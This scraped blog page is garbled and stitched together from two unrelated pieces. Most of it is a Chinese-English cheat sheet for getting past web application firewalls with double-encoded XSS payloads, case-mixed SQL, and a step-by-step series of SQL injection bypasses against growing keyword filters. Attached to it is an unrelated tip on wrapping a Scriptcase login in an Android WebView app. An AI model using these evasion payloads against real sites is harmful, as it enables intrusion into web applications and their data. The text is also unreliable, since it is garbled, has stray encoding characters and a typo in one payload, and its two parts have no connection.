垃圾字符 Normal payloads get filtered out easily.Īdding some junk chars helps avoid detection (specific cases only). ![]() ![]() 混淆: %253Cscript%253Ealert()%253C%252Fscript%253Eīash allows path concatenation for execution.ĩ. ![]() Tabs and newlines further add to obfuscation. This type of filters can be bypassed by mixed encoding payloads. 混合编码 Sometimes, WAF rules often tend to filter out a specific type of encoding. :)Įncoded: '>TIP: 查看这些说明 this and this reports on HackerOne. 标准: SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'īypassed: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'īypassed: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F Step 9: 过滤关键词: and, or, union, where, limit, group by, select, ', hex, substr, white space.Step 8: 过滤关键词: and, or, union, where, limit, group by, select, ', hex, substr.Step 7: 过滤关键词: and, or, union, where, limit, group by, select, ', hex.被拦截的语句: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1īypass语句: 1 || 1 = 1 into outfile 'result.txt' Step 5: 过滤关键词: and, or, union, where, limit, group by, select.被拦截的语句: 1 || (select user from users group by user_id having user_id = 1) = 'admin'īypass语句: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1 Step 4: 过滤关键词: and, or, union, where, limit, group by.被拦截的语句: 1 || (select user from users limit 1) = 'admin'īypass语句: 1 || (select user from users group by user_id having user_id = 1) = 'admin' Step 3: 过滤关键词: and, or, union, where, limit.被拦截的语句: 1 || (select user from users where user_id = 1) = 'admin'īypass语句: 1 || (select user from users limit 1) = 'admin' 被拦截的语句: union select user, password from usersīypass语句: 1 || (select user from users where user_id = 1) = 'admin' *** the trick… the android app is made using app inventor it is free and super easy to “learn” (you dont learn so much you can make the app in a single evening or so) with a drag and drop sistem, its free and opensource.可能正则: preg_match('/(and|or|union)/i', $id) Then your user automaticly in one second gets into your scriptcase apps (just as the user would in a web browser but the user feels he is using an android app" ![]() Your scriptcase login app “catches” the user and password and process your login The android app send user and passwords to your scriptcase login app Then the app opens a webviewer (a web browser without url bar and all the stuff, just the web area, so the user thinks that he is whatching an app) the webview points to your web server address login app Maybe not what you are searching but let me know if it works for youĮasyly (cheating, using app inventor) make an android app that stores user and password of the user and the web address of your scriptcase app server (the app has and android installer, ca be placed on a app store, and has its own icon on the android mobile screen
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |